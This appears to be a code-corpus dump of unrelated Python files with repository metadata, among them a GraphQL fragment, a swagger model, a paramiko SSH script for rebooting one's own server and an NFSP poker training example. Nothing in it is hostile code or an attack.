                     'HS300': set(get_index_stocks('399300.XSHE', date=date)),  # CSI 300
                     'ZZ1000': set(get_index_stocks('000852.XSHG', date=date)),  # CSI 1000
                     'SZ': set(get_index_stocks('000001.XSHG', date=date))}  # SSE Composite
        with open('{}/StockDailyData/{}/index_dic.pkl'.format(data_path, date), 'wb') as f:
            pickle.dump(index_dic, f)
        print('{} done.'.format(date))
fd991e55f95c4bfe4d2a0c5b935f235c33c3adea | 360 | py | Python | main.py | kotekpsotek/awesome-instaling | ccabd75b8dad899a297125fb888b52b1b9fd77f7 | [
"MIT"
] | null | null | null | main.py | kotekpsotek/awesome-instaling | ccabd75b8dad899a297125fb888b52b1b9fd77f7 | [
"MIT"
] | null | null | null | main.py | kotekpsotek/awesome-instaling | ccabd75b8dad899a297125fb888b52b1b9fd77f7 | [
"MIT"
] | null | null | null | from get_set_login_data import get_login_data
from instaling import start_instaling
if __name__ == "__main__":
main() | 36 | 91 | 0.713889 | from get_set_login_data import get_login_data
from instaling import start_instaling
def main():
    """Fetch stored credentials and start the instaling session."""
    # NOTE(review): unpacking .values() relies on the returned dict keeping
    # login-before-password insertion order — confirm in get_set_login_data.
    login, password = get_login_data().values() # get login data and quick destructure them
    start_instaling(login, password) # start instaling
    # print("The login is: " + login + "\n" + "The password is: " + password)
if __name__ == "__main__":
main() | 215 | 0 | 23 |
72851db9122740699bd2adbb8f7f8a806d22f652 | 126 | py | Python | opdracht-01.py | TPLxxA/pathways-python-opdrachten | e29da62cb91257afce2ff81acd23def68b082914 | [
"Unlicense"
] | null | null | null | opdracht-01.py | TPLxxA/pathways-python-opdrachten | e29da62cb91257afce2ff81acd23def68b082914 | [
"Unlicense"
] | null | null | null | opdracht-01.py | TPLxxA/pathways-python-opdrachten | e29da62cb91257afce2ff81acd23def68b082914 | [
"Unlicense"
] | null | null | null | var = "Casper"
print ("Value 1:", var)
var = 23
print ("Value 2:", var)
var = "You get the point"
print ("Value 3:", var) | 21 | 26 | 0.579365 | var = "Casper"
print ("Value 1:", var)
var = 23
print ("Value 2:", var)
var = "You get the point"
print ("Value 3:", var) | 0 | 0 | 0 |
724a1a0ea383615277b1e465022474b304dd6a5b | 1,905 | py | Python | tests/schema/product/gql/fragments/fragment_product.py | simonsobs/acondbs | 6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6 | [
"MIT"
] | null | null | null | tests/schema/product/gql/fragments/fragment_product.py | simonsobs/acondbs | 6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6 | [
"MIT"
] | 24 | 2020-04-02T19:29:07.000Z | 2022-03-08T03:05:43.000Z | tests/schema/product/gql/fragments/fragment_product.py | simonsobs/acondbs | 6ca11c2889d827ecdb2b54d0cf3b94b8cdd281e6 | [
"MIT"
] | 1 | 2020-04-08T15:48:28.000Z | 2020-04-08T15:48:28.000Z | FRAGMENT_PRODUCT = """
fragment fragmentProduct on Product {
productId
typeId
type_ {
typeId
name
}
attributesUnicodeText {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesBoolean {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesInteger {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesFloat {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDate {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDateTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
name
contact
dateProduced
producedBy
timePosted
postedBy
postingGitHubUser {
login
}
timeUpdated
updatedBy
updatingGitHubUser {
login
}
paths {
edges {
node {
pathId
path
note
}
}
}
relations {
edges {
node {
relationId
typeId
type_ {
typeId
name
}
otherProductId
other {
productId
typeId
type_ {
typeId
name
}
name
}
reverseRelationId
reverse {
relationId
typeId
type_ {
typeId
name
}
}
}
}
}
note
}
"""
| 12.7 | 37 | 0.379528 | FRAGMENT_PRODUCT = """
fragment fragmentProduct on Product {
productId
typeId
type_ {
typeId
name
}
attributesUnicodeText {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesBoolean {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesInteger {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesFloat {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDate {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesDateTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
attributesTime {
edges {
node {
name
field {
name
type_
}
value
}
}
}
name
contact
dateProduced
producedBy
timePosted
postedBy
postingGitHubUser {
login
}
timeUpdated
updatedBy
updatingGitHubUser {
login
}
paths {
edges {
node {
pathId
path
note
}
}
}
relations {
edges {
node {
relationId
typeId
type_ {
typeId
name
}
otherProductId
other {
productId
typeId
type_ {
typeId
name
}
name
}
reverseRelationId
reverse {
relationId
typeId
type_ {
typeId
name
}
}
}
}
}
note
}
"""
| 0 | 0 | 0 |
78c6be06d7717f86a877f33e3e064213195a0051 | 2,049 | py | Python | backend/firebug_server/swagger_server/models/concentration_series.py | aandr/firebug | bae24a65994b0ed1ab0dc3c1295f884d526ae2ba | [
"MIT"
] | null | null | null | backend/firebug_server/swagger_server/models/concentration_series.py | aandr/firebug | bae24a65994b0ed1ab0dc3c1295f884d526ae2ba | [
"MIT"
] | 7 | 2021-03-09T09:59:54.000Z | 2022-02-26T13:14:59.000Z | backend/firebug_server/swagger_server/models/concentration_series.py | aandr/firebug | bae24a65994b0ed1ab0dc3c1295f884d526ae2ba | [
"MIT"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ConcentrationSeries(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, concentrationlist: List[float]=None): # noqa: E501
"""ConcentrationSeries - a model defined in Swagger
:param concentrationlist: The concentrationlist of this ConcentrationSeries. # noqa: E501
:type concentrationlist: List[float]
"""
self.swagger_types = {
'concentrationlist': List[float]
}
self.attribute_map = {
'concentrationlist': 'concentrationlist'
}
self._concentrationlist = concentrationlist
@classmethod
def from_dict(cls, dikt) -> 'ConcentrationSeries':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ConcentrationSeries of this ConcentrationSeries. # noqa: E501
:rtype: ConcentrationSeries
"""
return util.deserialize_model(dikt, cls)
@property
def concentrationlist(self) -> List[float]:
"""Gets the concentrationlist of this ConcentrationSeries.
:return: The concentrationlist of this ConcentrationSeries.
:rtype: List[float]
"""
return self._concentrationlist
@concentrationlist.setter
def concentrationlist(self, concentrationlist: List[float]):
"""Sets the concentrationlist of this ConcentrationSeries.
:param concentrationlist: The concentrationlist of this ConcentrationSeries.
:type concentrationlist: List[float]
"""
if concentrationlist is None:
raise ValueError("Invalid value for `concentrationlist`, must not be `None`") # noqa: E501
self._concentrationlist = concentrationlist
| 30.58209 | 103 | 0.673987 | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ConcentrationSeries(Model):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, concentrationlist: List[float]=None): # noqa: E501
"""ConcentrationSeries - a model defined in Swagger
:param concentrationlist: The concentrationlist of this ConcentrationSeries. # noqa: E501
:type concentrationlist: List[float]
"""
self.swagger_types = {
'concentrationlist': List[float]
}
self.attribute_map = {
'concentrationlist': 'concentrationlist'
}
self._concentrationlist = concentrationlist
@classmethod
def from_dict(cls, dikt) -> 'ConcentrationSeries':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ConcentrationSeries of this ConcentrationSeries. # noqa: E501
:rtype: ConcentrationSeries
"""
return util.deserialize_model(dikt, cls)
@property
def concentrationlist(self) -> List[float]:
"""Gets the concentrationlist of this ConcentrationSeries.
:return: The concentrationlist of this ConcentrationSeries.
:rtype: List[float]
"""
return self._concentrationlist
@concentrationlist.setter
def concentrationlist(self, concentrationlist: List[float]):
"""Sets the concentrationlist of this ConcentrationSeries.
:param concentrationlist: The concentrationlist of this ConcentrationSeries.
:type concentrationlist: List[float]
"""
if concentrationlist is None:
raise ValueError("Invalid value for `concentrationlist`, must not be `None`") # noqa: E501
self._concentrationlist = concentrationlist
| 0 | 0 | 0 |
f0d0f00450724876d5e490a03f16b544916b1045 | 2,007 | py | Python | src/Multithreading.py | ng-haste/pyNG-HASTE | c910e126ec1bf2a7be3afc7e587f782a6b3fc97a | [
"MIT"
] | null | null | null | src/Multithreading.py | ng-haste/pyNG-HASTE | c910e126ec1bf2a7be3afc7e587f782a6b3fc97a | [
"MIT"
] | null | null | null | src/Multithreading.py | ng-haste/pyNG-HASTE | c910e126ec1bf2a7be3afc7e587f782a6b3fc97a | [
"MIT"
] | null | null | null | from Algorithm import SearchTree, GraphContainer
from multiprocessing import Process, Queue
import time
| 25.0875 | 121 | 0.586447 | from Algorithm import SearchTree, GraphContainer
from multiprocessing import Process, Queue
import time
def runJob(env, container, q):
    """Run up to 10,000 search-tree iterations on *container*, then report.

    Builds a SearchTree over *container* and steps it until the container is
    empty or the iteration cap is reached, then puts (container, iterations)
    on the multiprocessing queue *q* for the parent process to merge.
    (The previous version also recorded an unused start timestamp, which has
    been removed.)
    """
    tree = SearchTree(container, env)
    iterations = 0
    # Cap the batch so each worker reports back to the parent regularly.
    for _ in range(10000):
        if container.isEmpty():
            break
        tree.nextItr()
        iterations += 1
    q.put((container, iterations))
def startThread(env, container, q):
    """Grow *container* to at least 250 open graphs, then fork a worker.

    Iterates a SearchTree locally until 250 graphs are available, moves the
    first 250 into a fresh GraphContainer and hands it to a new runJob
    process via queue *q*.

    :return: number of local iterations performed while growing the container
    """
    tree = None
    itr = 0
    while len(container.graphs) < 250:
        # Build the tree lazily, only if the container actually needs growth.
        # (`is None` replaces the previous `== None` identity-vs-equality mixup.)
        if tree is None:
            tree = SearchTree(container, env)
        tree.nextItr()
        itr += 1
    miniCon = GraphContainer()
    miniCon.graphs = container.graphs[:250]
    container.graphs = container.graphs[250:]
    Process(target=runJob, args=(env, miniCon, q)).start()
    return itr
def findSolutionParrallel(env, container, threadCount):
    """Search for solutions by fanning work out to up to *threadCount* workers.

    NOTE(review): despite the name (typo "Parrallel" kept for caller
    compatibility), workers are separate processes, not threads.
    Returns the total number of iterations performed.
    """
    startTime = time.time()
    liveThreads = 0
    itr = 0
    q = Queue()
    # Seed the initial batch of workers.
    for i in range(threadCount):
        if container.isEmpty():
            break
        itr += startThread(env, container, q)
        liveThreads += 1
    foundSolution = False
    while liveThreads > 0 and not foundSolution:
        # Block until some worker reports its (container, iteration-count) result.
        miniCon, iterations = q.get()
        liveThreads -= 1
        itr += iterations
        # Merge the worker's open graphs and any solutions back into the
        # main container; any solution ends the search after this round.
        for graph in miniCon.graphs:
            container.push(graph)
        for solution in miniCon.solutions:
            container.addSolution(solution)
            foundSolution = True
        if not foundSolution:
            # Keep the worker pool topped up while open work remains.
            while liveThreads < threadCount:
                if container.isEmpty():
                    break
                itr += startThread(env, container, q)
                liveThreads += 1
    endTime = time.time()
    elapsedTime = endTime - startTime
    # NOTE(review): if the search finishes near-instantly, elapsedTime can be
    # ~0 and the g/s rate below divides by zero — confirm acceptable.
    print('Iterations: {: >9,}, Open: {: >9,}, Solutions: {: >3,}, Time: {: >7,.1f}s ({: >7,.1f}g/s), Threads: {}'
          .format(itr, len(container.graphs), len(container.solutions), elapsedTime, itr / elapsedTime, liveThreads))
    return itr
| 1,831 | 0 | 69 |
56fb5246123ec3f1497bc6a06efa6f423a14c683 | 3,209 | py | Python | test/testAuthentication.py | twissell-/anipy | 331fa229c5d2a523de02254835c15eee91c4333b | [
"MIT"
] | 14 | 2016-07-14T17:23:47.000Z | 2021-07-02T02:39:55.000Z | test/testAuthentication.py | twissell-/anipy | 331fa229c5d2a523de02254835c15eee91c4333b | [
"MIT"
] | 4 | 2016-11-14T23:01:03.000Z | 2021-06-22T15:02:14.000Z | test/testAuthentication.py | twissell-/anipy | 331fa229c5d2a523de02254835c15eee91c4333b | [
"MIT"
] | 3 | 2020-10-30T13:54:51.000Z | 2022-03-05T16:56:01.000Z | from urllib3_mock import Responses
from anipy import (
AuthenticationProvider,
)
import os
# from anipy.exception import AniException
# from anipy.exception import InternalServerError
# from anipy.exception import InvalidGrantException
# from anipy.exception import InvalidRequestException
# from anipy.exception import UnauthorizedException
| 31.15534 | 67 | 0.599564 | from urllib3_mock import Responses
from anipy import (
AuthenticationProvider,
)
import os
# from anipy.exception import AniException
# from anipy.exception import InternalServerError
# from anipy.exception import InvalidGrantException
# from anipy.exception import InvalidRequestException
# from anipy.exception import UnauthorizedException
class TestAuthentication(object):
    """Tests for AuthenticationProvider token refresh and caching."""
    # Mocked urllib3 transport; used by the commented-out error-path tests below.
    responses = Responses('requests.packages.urllib3')
    def testRefreshAuthentication(self):
        # Performs a real token refresh; expects REFRESH_TOKEN in the environment.
        auth = AuthenticationProvider.currentAuth()
        assert auth.accessToken
        assert auth.expires
        assert auth.tokenType == 'Bearer'
        assert auth.expiresIn == 3600
        assert auth.refreshToken == os.environ.get('REFRESH_TOKEN')
        assert not auth.isExpired
        # currentAuth() must cache and return the same instance on re-call.
        assert auth is AuthenticationProvider.currentAuth()
# @responses.activate
# def testInternalServerError(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# status=500)
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, InternalServerError)
# else:
# assert False
#
# @responses.activate
# def testMethodNotAllowed(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# status=405)
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, AniException)
# assert str(e) == 'HTTP 405 Method not allowed.'
# else:
# assert False
#
# @responses.activate
# def testInvalidGrantException(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# body=b'{"error":"invalid_grant"}',
# status=400,
# content_type='application/json')
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, InvalidGrantException)
# else:
# assert False
#
# @responses.activate
# def testInvalidRequest(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# body=b'{"error":"invalid_request"}',
# status=400,
# content_type='application/json')
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, InvalidRequestException)
# else:
# assert False
#
# @responses.activate
# def testInvalidUnauthorizedException(self):
# TestAuthentication.responses.add(
# 'POST', '/api/auth/access_token',
# body=b'{"error":"unauthorized"}',
# status=401,
# content_type='application/json')
#
# try:
# Authentication.fromCode('authenticationcode')
# except Exception as e:
# assert isinstance(e, UnauthorizedException)
# else:
# assert False
| 371 | 2,465 | 23 |
e1d33fe276058ac77a26d51b4cdc63a4bb229f10 | 1,658 | py | Python | ymir/backend/src/ymir_controller/controller/invoker/invoker_cmd_branch_list.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 64 | 2021-11-15T03:48:00.000Z | 2022-03-25T07:08:46.000Z | ymir/backend/src/ymir_controller/controller/invoker/invoker_cmd_branch_list.py | Zhang-SJ930104/ymir | dd6481be6f229ade4cf8fba64ef44a15357430c4 | [
"Apache-2.0"
] | 35 | 2021-11-23T04:14:35.000Z | 2022-03-26T09:03:43.000Z | ymir/backend/src/ymir_controller/controller/invoker/invoker_cmd_branch_list.py | Aryalfrat/ymir | d4617ed00ef67a77ab4e1944763f608bface4be6 | [
"Apache-2.0"
] | 57 | 2021-11-11T10:15:40.000Z | 2022-03-29T07:27:54.000Z | from controller.invoker.invoker_cmd_base import BaseMirControllerInvoker
from controller.utils import checker, utils
from id_definition.error_codes import CTLResponseCode
from proto import backend_pb2
| 46.055556 | 112 | 0.600724 | from controller.invoker.invoker_cmd_base import BaseMirControllerInvoker
from controller.utils import checker, utils
from id_definition.error_codes import CTLResponseCode
from proto import backend_pb2
class BranchListInvoker(BaseMirControllerInvoker):
def pre_invoke(self) -> backend_pb2.GeneralResp:
return checker.check_request(request=self._request,
prerequisites=[
checker.Prerequisites.CHECK_USER_ID,
checker.Prerequisites.CHECK_REPO_ID,
checker.Prerequisites.CHECK_REPO_ROOT_EXIST,
],
mir_root=self._repo_root)
def invoke(self) -> backend_pb2.GeneralResp:
expected_type = backend_pb2.RequestType.CMD_BRANCH_LIST
if self._request.req_type != expected_type:
return utils.make_general_response(CTLResponseCode.MIS_MATCHED_INVOKER_TYPE,
f"expected: {expected_type} vs actual: {self._request.req_type}")
command = [utils.mir_executable(), 'branch', '--root', self._repo_root]
response = utils.run_command(command)
if response.code == 0 and response.message:
message_lines = response.message.splitlines()
for message_line in message_lines:
# remove empty lines
message_line = message_line.strip()
if message_line:
response.ext_strs.append(message_line)
response.message = ""
return response
| 1,351 | 29 | 76 |
97dfc3b4f92246adb98d90753894a41d866a8df3 | 292 | py | Python | view_breadcrumbs/generic/__init__.py | codacy-badger/django-view-breadcrumbs | f6edd20db12c7afdb1ba14bf84b78eeca90ee72b | [
"BSD-3-Clause"
] | 29 | 2020-10-17T05:28:52.000Z | 2022-03-10T21:14:06.000Z | view_breadcrumbs/generic/__init__.py | codacy-badger/django-view-breadcrumbs | f6edd20db12c7afdb1ba14bf84b78eeca90ee72b | [
"BSD-3-Clause"
] | 225 | 2020-08-17T13:21:41.000Z | 2022-03-31T11:58:50.000Z | view_breadcrumbs/generic/__init__.py | codacy-badger/django-view-breadcrumbs | f6edd20db12c7afdb1ba14bf84b78eeca90ee72b | [
"BSD-3-Clause"
] | 5 | 2021-04-24T21:30:21.000Z | 2021-11-01T20:28:19.000Z | from .base import BaseBreadcrumbMixin # noqa
from .create import CreateBreadcrumbMixin # noqa
from .delete import DeleteBreadcrumbMixin # noqa
from .detail import DetailBreadcrumbMixin # noqa
from .list import ListBreadcrumbMixin # noqa
from .update import UpdateBreadcrumbMixin # noqa
| 41.714286 | 49 | 0.815068 | from .base import BaseBreadcrumbMixin # noqa
from .create import CreateBreadcrumbMixin # noqa
from .delete import DeleteBreadcrumbMixin # noqa
from .detail import DetailBreadcrumbMixin # noqa
from .list import ListBreadcrumbMixin # noqa
from .update import UpdateBreadcrumbMixin # noqa
| 0 | 0 | 0 |
1f6d256b45288074b3de10940e3ca152e1a8f5d6 | 217 | py | Python | shlink/data/__init__.py | DavidSouthgate/shlink-py | 86320dd55bfb391c9d66d2d2014463661cee6e58 | [
"MIT"
] | null | null | null | shlink/data/__init__.py | DavidSouthgate/shlink-py | 86320dd55bfb391c9d66d2d2014463661cee6e58 | [
"MIT"
] | null | null | null | shlink/data/__init__.py | DavidSouthgate/shlink-py | 86320dd55bfb391c9d66d2d2014463661cee6e58 | [
"MIT"
] | 1 | 2021-06-23T13:04:57.000Z | 2021-06-23T13:04:57.000Z | from .data import Data
from .error import Error
from .paged_data import PagedData
from .pagination import Pagination
from .short_url import ShortUrl
__all__ = ["Data", "PagedData", "Error", "Pagination", "ShortUrl"]
| 27.125 | 66 | 0.769585 | from .data import Data
from .error import Error
from .paged_data import PagedData
from .pagination import Pagination
from .short_url import ShortUrl
__all__ = ["Data", "PagedData", "Error", "Pagination", "ShortUrl"]
| 0 | 0 | 0 |
d077aba0bc5f6fe39e822869cd7ddde2d6493c66 | 2,173 | py | Python | serverchecker.py | EMC-prog/ServerChecker | 718b8d1b88880fb902c8376af3c7be11d71cdd86 | [
"MIT"
] | 1 | 2022-01-29T07:45:54.000Z | 2022-01-29T07:45:54.000Z | serverchecker.py | EMC-prog/ServerChecker | 718b8d1b88880fb902c8376af3c7be11d71cdd86 | [
"MIT"
] | null | null | null | serverchecker.py | EMC-prog/ServerChecker | 718b8d1b88880fb902c8376af3c7be11d71cdd86 | [
"MIT"
] | null | null | null | # Original by EMC-prog
# UNDER THE MIT LICENSE
import paramiko
import time
import os
import json
import sys
from getpass import getpass
print("ServerChecker")
print("Check and command your linux server without knowing Linux")
time.sleep(2)
os.system('cls' if os.name == 'nt' else 'clear')
#Know if the program has been opened already:
f = open("data/1ststart", "r")
iststart = f.read()
f.close
if iststart == "0":
print("Looks like you haven't started this program before. You have to fill the file located in 'data/info.txt'.")
ok = input("If you have already done the setup, press enter and execute the program again. If you haven't, edit the file with the help of the manual.")
f = open("data/1ststart", "w")
iststart = f.write("1")
f.close
sys.exit()
#open json file with the server data
js = open("data/info.txt", "r")
jsondata = f.read()
file_path = "data/info.txt"
with open(file_path, 'r') as j:
jdfp = json.loads(j.read())
#jdfp = json.loads(jsondata)
f.close
os.system('cls' if os.name == 'nt' else 'clear')
#Initial menu
print("Options avalible for the server: ")
print("1) Check server temperature (NOT WORKING)")
print("2) Reboot the server")
print("3) Shut down the server (in 1 minute)")
print("4) Shut down the server (instantaniously)")
print("5) Custom command (check README)")
option = input("Type a number an then press enter: ")
#Enter the server
host = (jdfp["ip"])
port = (jdfp["port"])
username = (jdfp["user"])
password = getpass("Password for user " + username + ": ")
# Check the number selected:
if option == "1":
command = "echo wip"
elif option == "2":
command = "sudo reboot"
elif option == "3":
command = "sudo shutdown +1"
elif option == "4":
command = "sudo shutdown now"
elif option == "5":
command = (jdfp["custom_command"])
else:
print("ERROR: No command selected. Program will close.")
sys.exit()
#make contact with server and do operation
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, username, password)
stdin, stdout, stderr = ssh.exec_command(command)
lines = stdout.readlines()
print(lines)
| 26.5 | 155 | 0.687989 | # Original by EMC-prog
# UNDER THE MIT LICENSE
# ServerChecker: menu-driven helper that runs a canned command on a remote
# Linux server over SSH (paramiko), using settings read from data/info.txt.
import paramiko
import time
import os
import json
import sys
from getpass import getpass

print("ServerChecker")
print("Check and command your linux server without knowing Linux")
time.sleep(2)
os.system('cls' if os.name == 'nt' else 'clear')

# First-run marker: "data/1ststart" holds "0" until setup is confirmed.
# (BUGFIX: the original did "f.close" without parentheses, which never
# closed the handle; context managers close reliably.)
with open("data/1ststart", "r") as f:
    iststart = f.read()

if iststart == "0":
    print("Looks like you haven't started this program before. You have to fill the file located in 'data/info.txt'.")
    ok = input("If you have already done the setup, press enter and execute the program again. If you haven't, edit the file with the help of the manual.")
    with open("data/1ststart", "w") as f:
        f.write("1")
    sys.exit()

# Load the server connection settings (a JSON document despite the .txt
# extension). BUGFIX: the original also opened an extra leaked handle 'js'
# and read 'jsondata' from the wrong, already-exhausted handle; both were
# dead code and are removed.
file_path = "data/info.txt"
with open(file_path, 'r') as j:
    jdfp = json.loads(j.read())

os.system('cls' if os.name == 'nt' else 'clear')

# Initial menu
print("Options avalible for the server: ")
print("1) Check server temperature (NOT WORKING)")
print("2) Reboot the server")
print("3) Shut down the server (in 1 minute)")
print("4) Shut down the server (instantaniously)")
print("5) Custom command (check README)")
option = input("Type a number an then press enter: ")

# Connection details for the target server.
host = jdfp["ip"]
port = jdfp["port"]
username = jdfp["user"]
password = getpass("Password for user " + username + ": ")

# Map the selected option to the shell command to run.
if option == "1":
    command = "echo wip"
elif option == "2":
    command = "sudo reboot"
elif option == "3":
    command = "sudo shutdown +1"
elif option == "4":
    command = "sudo shutdown now"
elif option == "5":
    command = jdfp["custom_command"]
else:
    print("ERROR: No command selected. Program will close.")
    sys.exit()

# Connect over SSH, run the command and show its output.
ssh = paramiko.SSHClient()
# Auto-accepts unknown host keys (convenient, but skips host verification).
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect(host, port, username, password)
    stdin, stdout, stderr = ssh.exec_command(command)
    lines = stdout.readlines()
    print(lines)
finally:
    # BUGFIX: the original never closed the SSH connection.
    ssh.close()
| 0 | 0 | 0 |
7999c1dc2f3ca8e7e583e7fb697df31e59fc908a | 929 | py | Python | src/setup.py | thhapke/DI_Pandas | 7a9108007459260a30ea7ee404a76b42861c81c5 | [
"MIT"
] | 2 | 2020-01-02T19:54:46.000Z | 2020-03-09T08:49:33.000Z | src/setup.py | thhapke/DI_Pandas | 7a9108007459260a30ea7ee404a76b42861c81c5 | [
"MIT"
] | null | null | null | src/setup.py | thhapke/DI_Pandas | 7a9108007459260a30ea7ee404a76b42861c81c5 | [
"MIT"
] | 1 | 2020-03-28T22:53:16.000Z | 2020-03-28T22:53:16.000Z | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="sdi_pandas",
version="0.0.38",
author="Thorsten Hapke",
author_email="thorsten.hapke@sap.com",
description="List of operators using the pandas module for processing the input",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/thhapke/sdi_pandas/",
keywords = ['SAP Data Intelligence','pandas','operator'],
packages=setuptools.find_packages(),
install_requires=[
'pandas',
'numpy',
'fuzzywuzzy'
],
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | 30.966667 | 85 | 0.650161 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="sdi_pandas",
version="0.0.38",
author="Thorsten Hapke",
author_email="thorsten.hapke@sap.com",
description="List of operators using the pandas module for processing the input",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/thhapke/sdi_pandas/",
keywords = ['SAP Data Intelligence','pandas','operator'],
packages=setuptools.find_packages(),
install_requires=[
'pandas',
'numpy',
'fuzzywuzzy'
],
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | 0 | 0 | 0 |
4aaa7331a48d35a7a77be12908d0f10a4108f6d1 | 3,447 | py | Python | examples/limit_holdem_nfsp_pytorch.py | Res260/rlcard | c0fc9fe70c4ec1c726e5e66b62866086491f5dbf | [
"MIT"
] | 2 | 2020-08-24T21:30:44.000Z | 2020-10-27T03:44:04.000Z | examples/limit_holdem_nfsp_pytorch.py | Res260/rlcard | c0fc9fe70c4ec1c726e5e66b62866086491f5dbf | [
"MIT"
] | null | null | null | examples/limit_holdem_nfsp_pytorch.py | Res260/rlcard | c0fc9fe70c4ec1c726e5e66b62866086491f5dbf | [
"MIT"
] | 2 | 2020-02-23T17:26:14.000Z | 2020-12-22T15:34:13.000Z | ''' An example of learning a NFSP Agent on Limit Texas Holdem
'''
import torch
import rlcard
from rlcard.agents.nfsp_agent_pytorch import NFSPAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('limit-holdem')
eval_env = rlcard.make('limit-holdem')
# Set the iterations numbers and how frequently we evaluate/save plot
evaluate_every = 100
save_plot_every = 1000
evaluate_num = 10000
episode_num = 10000000
# Set the the number of steps for collecting normalization statistics
# and intial memory size
memory_init_size = 1000
norm_step = 1000
# The paths for saving the logs and learning curves
root_path = './experiments/limit_holdem_nfsp_pytorch_result/'
log_path = root_path + 'log.txt'
csv_path = root_path + 'performance.csv'
figure_path = root_path + 'figures/'
# Set a global seed
set_global_seed(0)
# Set agents
# One NFSP agent per seat; they train against each other via env.run().
agents = []
for i in range(env.player_num):
    agent = NFSPAgent(scope='nfsp' + str(i),
                      action_num=env.action_num,
                      state_shape=env.state_shape,
                      hidden_layers_sizes=[512,512],
                      anticipatory_param=0.1,
                      min_buffer_size_to_learn=memory_init_size,
                      q_replay_memory_init_size=memory_init_size,
                      q_norm_step=norm_step,
                      q_mlp_layers=[512,512])
    agents.append(agent)
random_agent = RandomAgent(action_num=eval_env.action_num)
env.set_agents(agents)
# Evaluation pits the first trained agent against a random opponent.
eval_env.set_agents([agents[0], random_agent])
# Count the number of steps
step_counters = [0 for _ in range(env.player_num)]
# Init a Logger to plot the learning curve
logger = Logger(xlabel='timestep', ylabel='reward', legend='NFSP on Limit Texas Holdem', log_path=log_path, csv_path=csv_path)
for episode in range(episode_num):
    # First sample a policy for the episode
    for agent in agents:
        agent.sample_episode_policy()
    # Generate data from the environment
    trajectories, _ = env.run(is_training=True)
    # Feed transitions into agent memory, and train the agent
    for i in range(env.player_num):
        for ts in trajectories[i]:
            agents[i].feed(ts)
            step_counters[i] += 1
            # Train the agent
            # Training only starts after the warm-up period of
            # (memory_init_size + norm_step) feeds, then fires every 64 feeds.
            train_count = step_counters[i] - (memory_init_size + norm_step)
            if train_count > 0 and train_count % 64 == 0:
                rl_loss = agents[i].train_rl()
                sl_loss = agents[i].train_sl()
                print('\rINFO - Agent {}, step {}, rl-loss: {}, sl-loss: {}'.format(i, step_counters[i], rl_loss, sl_loss), end='')
    # Evaluate the performance. Play with random agents.
    if episode % evaluate_every == 0:
        reward = 0
        for eval_episode in range(evaluate_num):
            _, payoffs = eval_env.run(is_training=False)
            reward += payoffs[0]
        logger.log('\n########## Evaluation ##########')
        logger.log('Timestep: {} Average reward is {}'.format(env.timestep, float(reward)/evaluate_num))
        # Add point to logger
        logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)
    # Make plot
    if episode % save_plot_every == 0 and episode > 0:
        logger.make_plot(save_path=figure_path+str(episode)+'.png')
# Make the final plot
# ('episode' holds its final value from the loop above.)
logger.make_plot(save_path=figure_path+'final_'+str(episode)+'.png')
| 34.128713 | 131 | 0.669568 | ''' An example of learning a NFSP Agent on Limit Texas Holdem
'''
import torch
import rlcard
from rlcard.agents.nfsp_agent_pytorch import NFSPAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('limit-holdem')
